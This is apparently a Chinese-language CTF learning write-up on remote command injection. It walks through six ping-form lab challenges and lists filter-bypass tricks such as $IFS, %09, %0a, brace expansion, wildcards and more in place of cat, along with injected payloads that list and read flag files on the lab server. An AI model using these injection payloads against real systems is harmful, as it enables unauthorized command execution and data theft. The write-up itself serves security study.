CTF_WEB学习-------------RCE之命令注入
REC
什么是RCE?
? 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。
RCE产生的原因?
? 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。
RCE漏洞分类

命令注入
什么是命令注入?
? 命令注入就是通过控制外部的参数达到执行系统命令的效果
RCE命令注入分类
- 无过滤
- 过滤cat
- 过滤空格
- 过滤目录分隔符
- 过滤运算符
- 综合过滤练习
无过滤
题目

解题过程
- 首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls。
 - 接着查看里面的文件,构造命令127.0.0.1;cat +文件名
 - 右键查看前端源码,发现存在flag

过滤cat
? 过滤cat,那么我们应当首先想到什么命令可以和cat 拥有相同的效果。和cat具有相同效果的命令有:
题目
? 题目提示:过滤了cat命令之后,你还有什么方法能读到 Flag?
解题过程
- 执行命令127.0.0.1;ls,发现几个PHP文件
 - 因为cat会被过滤,使用more命令去代替它,127.0.0.1; more flag_317491770120937.php

过滤空格
? 过滤空格,我们首先想到CTF题目中什么可以替代空格,这样的话我们就可以成功的绕过空格被过滤的限制。CTF中常用的绕过过滤空格的方法有:
$IFS
$IFS$1
${IFS}
$IFS$9
< 比如cat<a.tct:表示cat a.txt
<>
{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来
%20
%09
题目
? 题目提示:这次过滤了空格,你能绕过吗,我们就采取措施,想办法去绕过过滤。
解题过程
- 执行命令 127.0.0.1;ls,查看可以访问的文件,发现一个flag_12954450028809.php文件。
 - 使用cat命令去查看这个文件中有什么,并且此时要绕过对空格的过滤,执行命令:127.0.0.1; cat${IFS}flag_12954450028809.php,拿到flag。

过滤目录分隔符
? 题目提示:这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗
? 本题的思路不是用什么东西去绕过目录分隔符店的过滤,而是这个题目是对文件夹里的目录里的PHP文件的读取,所以我们不能直接cat文件夹,我们应当使用的系统命令cd去查看文件夹下的文件,然后去cat文件夹下的PHP文件。
题目

解题过程
- 阅读源码发现过滤**/ \ //**,我们不能利用目录分割符,去访问文件。
 - 我们使用cd 命令查看这个文件夹127.0.0.1;cd flag_is_here;ls
 - 接着我们去cat flag_18515776511094.php执行命令127.0.0.1;cd flag_is_here;cat flag_18515776511094.php,获取到flag

过滤运算符
? 这个题目说过滤几个运算符,但是不影响我们做题,和前面的几道题目的思路类似。
题目
? 题目提示:过滤了几个运算符, 要怎么绕过呢

解题过程
- 执行命令127.0.0.1;ls,查看可利用信息,发现一个PHP文件。
 - 执行命令**127.0.0.1;cat flag_6086289321351.php,**拿到flag

综合过滤练习
? 题目对**|,&,;, ,/,cat,flag,ctfhub**这些进行了过滤,我们的目的就是对这些进行替换
用more替换cat
用%0a去替换;
空格用${IFS}替换
flag可以用正则替换f***
flag可以用TAB加*替换,不过要用url编码TAB,表示为%09加*
注意本题提交的payload都是在浏览器输入框中输入的,不然会被二次转义。
题目
? 题目提示:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢?
解题过程
-
输入命令127.0.0.1%0als,使用%0a代替 ; -
使用正则表达式代替flag,使用{IFS}代替空格,此处注意传cd到文件夹下以后,要使用ls将文件加下的文件列出来。最后输入命令127.0.0.1%0acd${IFS}f***_is_here ${IFS}%0als -
输入命令ip=127.0.0.1%0acd${IFS}f***_is_here ${IFS}%0amore ${IFS}f***_5222980724357.php,获取到flag

- 输入命令ip=127.0.0.1%0acd${IFS}f***_is_here
${IFS}%0amore{IFS} f***_5222980724357.php,获取到flag

|